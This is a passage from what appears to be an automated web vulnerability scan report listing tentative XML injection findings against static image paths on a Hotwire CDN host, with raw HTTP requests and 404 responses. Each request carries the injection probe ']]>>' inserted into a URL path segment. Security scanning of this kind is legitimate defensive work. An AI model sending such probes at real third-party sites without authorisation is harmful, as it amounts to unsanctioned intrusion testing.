User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.130. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-gradient-for-details-sections.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-bottom-gradient-for-details-sections.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:38 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.131. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-gradient-for-details-sections.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-bottom-gradient-for-details-sections.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:40 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.132. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-gradient-opaque-price-info-module.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-gradient-opaque-price-info-module.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535984
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.133. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-gradient-opaque-price-info-module.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-gradient-opaque-price-info-module.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.134. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-gradient-opaque-price-info-module.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-gradient-opaque-price-info-module.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.135. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-gradient-opaque-price-info-module.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-gradient-opaque-price-info-module.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.136. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-gradient-opaque-price-info-module.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-gradient-opaque-price-info-module.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:12 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.137. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-opaque-price-lockup-bg-new-large.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.138. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-opaque-price-lockup-bg-new-large.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535991
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.139. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-opaque-price-lockup-bg-new-large.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:04 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.140. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-opaque-price-lockup-bg-new-large.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.141. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:12 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.142. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.143. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.144. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-opaque-price-lockup-bg-new-large_cap.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.145. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-opaque-price-lockup-bg-new-large_cap.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.146. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
